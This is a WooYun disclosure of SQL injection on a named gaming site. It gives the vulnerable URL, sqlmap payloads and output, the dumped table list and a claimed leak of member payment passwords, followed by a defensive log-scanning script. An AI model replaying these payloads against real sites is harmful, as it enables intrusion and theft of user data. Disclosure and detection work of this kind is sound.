WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------------- http://drop.zone.ci/
2015-06-15: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-07-30: The vendor has actively ignored the vulnerability; details are now disclosed to the public.

Zugame main site SQL injection leaks 300,000 member records and payment passwords
http://www.zugame.com/xsk/?gid=249
28 databases:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests (0 because the output was resumed from a saved sqlmap session):
---
Place: GET
Parameter: gid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gid=249 AND 4954=4954

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: gid=249 AND 2415=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2415=2415) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: gid=-8823 UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(70)+CHAR(83)+CHAR(72)+CHAR(117)+CHAR(72)+CHAR(122)+CHAR(85)+CHAR(118)+CHAR(111)+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113),NULL--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: gid=-8764 OR 7099=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: gid=(SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8403=8403) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: AccDB
[54 tables]
+-----------------------+
| Account_tmp           |
| CPS_Binding           |
| D99_Tmp               |
| Forum                 |
| GOpenList             |
| GameList              |
| Gllj                  |
| GuildLink             |
| GuildUser             |
| HFForum               |
| LZCQ                  |
| New                   |
| PhoneBinding          |
| SQL_Dir               |
| SQL_Path              |
| Settlement            |
| ShouChong             |
| T_Dict_AlignIllegal   |
| T_Dict_AreaList       |
| T_Dict_AuthTypeDefine |
| T_Dict_DefaultFace    |
| T_Dict_GameType       |
| T_Dict_IPData         |
| T_Dict_IllegalWord    |
| T_Dict_JobList        |
| T_Dict_PartnerID      |
| T_Dict_PartnerID      |
| T_Dict_Question       |
| T_FindPWD             |
| T_IDCard              |
| T_Partner_User        |
| T_PhoneAuthByPwdReset |
| T_Queen_User          |
| T_ReturnValue         |
| T_SecretCard_Del      |
| T_SecretCard_Del      |
| T_UserDetails         |
| T_UserGameInfo        |
| T_UserKey             |
| T_UserLoginError      |
| T_UserOtherInfo       |
| T_UserPayPWD          |
| T_UserUpdEmailPush    |
| T_Validate_Email      |
| T_Validate_IDCardLog  |
| T_Validate_IDCardLog  |
| T_Validate_Moblie     |
| T_ZCEMailSendHisory   |
| T_ZCVipUser           |
| XinShouKa             |
| libao                 |
| pangolin_test_table   |
| sccharge              |
| shangcheng            |
+-----------------------+

Note on the table list: names such as pangolin_test_table and D99_Tmp are the residue typically left behind by the Pangolin injection tool and the D99 webshell's SQL module, which suggests this database had already been reached by automated tooling before this report was filed.
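The five payload shapes sqlmap reported above all survive in the IIS W3C logs of a server like this one, URL-encoded in the uri-query field. The following is an added illustration (not code from the report or from the vendor) of how a defender would pull them back out: it decodes the CHAR(113)+CHAR(101)+... chains into the literal strings they build (which exposes sqlmap's marker strings, qepqq and qjinq, that delimit extracted data in error-based and UNION responses), and classifies each request by the MSSQL-specific technique it uses. The log lines, the server and client addresses, and the user-agent strings are constructed for the example; the payload text is taken from the sqlmap output, with the heavy-query cross-join shortened to three copies of sysusers.

```python
"""Decode and classify sqlmap-style MSSQL payloads found in IIS W3C log lines.

Added illustration, not code from the report. The log lines are constructed here;
the payload shapes are the five sqlmap reported for the gid parameter.
"""
import re
from urllib.parse import parse_qs, quote

# Constructed traffic: (user agent, HTTP status, raw value of the gid parameter).
# The first entry is the legitimate request; the rest are the reported payload types.
SAMPLE_REQUESTS = [
    ("Mozilla/5.0", 200, "249"),
    ("sqlmap/1.0", 200, "249 AND 4954=4954"),
    ("sqlmap/1.0", 500, "249 AND 2415=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)"
                        "+CHAR(113)+(SELECT (CASE WHEN (2415=2415) THEN CHAR(49) ELSE CHAR(48) END))"
                        "+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113)))"),
    ("sqlmap/1.0", 200, "-8823 UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)"
                        "+CHAR(122)+CHAR(70)+CHAR(83)+CHAR(72)+CHAR(117)+CHAR(72)+CHAR(122)+CHAR(85)"
                        "+CHAR(118)+CHAR(111)+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113),NULL--"),
    ("sqlmap/1.0", 200, "-8764 OR 7099=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,"
                        "sysusers AS sys3)"),   # shortened: the report shows seven copies
    ("sqlmap/1.0", 200, "(SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN "
                        "(8403=8403) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(105)"
                        "+CHAR(110)+CHAR(113))"),
]


def build_sample_log() -> str:
    """Render the constructed requests as IIS W3C lines (date time s-ip method
    uri-stem uri-query s-port username c-ip user-agent status). A real client
    has to send '+' as %2B, otherwise the server reads it as a space and the
    CHAR() chain breaks; quote() encodes it that way."""
    lines = []
    for i, (ua, status, gid) in enumerate(SAMPLE_REQUESTS):
        query = "gid=" + quote(gid, safe="()*,")
        lines.append(f"2015-06-15 10:00:0{i} 10.0.0.5 GET /xsk/ {query} 80 - 203.0.113.7 {ua} {status}")
    return "\n".join(lines)


# One regex per technique in the sqlmap output; each is specific to the MSSQL payload shape.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I)),   # tautology 4954=4954
    ("error-based (CONVERT)", re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)),     # forced int conversion
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("time-based (heavy query)", re.compile(r"\bsysusers\s+AS\s+\w+\s*,\s*sysusers\b", re.I)),  # self cross-join
    ("inline query", re.compile(r"^\s*\(\s*SELECT\b", re.I)),                       # whole value is a subquery
]

CHAR_CHAIN = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*", re.I)


def decode_char_chains(sql: str) -> str:
    """Turn CHAR(113)+CHAR(101)+... into the quoted string it builds, so the
    sqlmap marker strings and extracted values become readable."""
    def repl(m: re.Match) -> str:
        codes = re.findall(r"CHAR\((\d+)\)", m.group(0), re.I)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_CHAIN.sub(repl, sql)


def classify(value: str) -> list[str]:
    """Names of every technique signature the raw parameter value matches."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def scan_log(log_text: str) -> list[dict]:
    """Return one finding per request whose gid value matches a signature."""
    findings = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 11 or f[3] != "GET":
            continue
        query, client, ua, status = f[5], f[8], f[9], f[10]
        for value in parse_qs(query).get("gid", []):   # parse_qs URL-decodes the value
            techniques = classify(value)
            if techniques:
                findings.append({"client": client, "ua": ua, "status": status,
                                 "techniques": techniques, "decoded": decode_char_chains(value)})
    return findings


if __name__ == "__main__":
    for hit in scan_log(build_sample_log()):
        print(hit["client"], hit["status"], hit["techniques"], hit["decoded"])
```

The decoded error-based payload reads 'qepqq'+(SELECT (CASE ... THEN '1' ELSE '0' END))+'qjinq': CONVERT(INT, ...) is forced to fail on that string, and the SQL Server conversion error message echoes it back, so sqlmap reads the 1 or 0 (or, in later requests, whole column values) from between the two markers. The same markers wrap the UNION payload's probe string. Matching on the raw value rather than on the decoded one matters, because the CHAR chains themselves are the most reliable sqlmap fingerprint in a log.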
340,000 member records:

340,000 payment passwords:

Vendor response: unable to reach the vendor, or the vendor actively refused.

Vulnerability Rank: 15 (WooYun rating)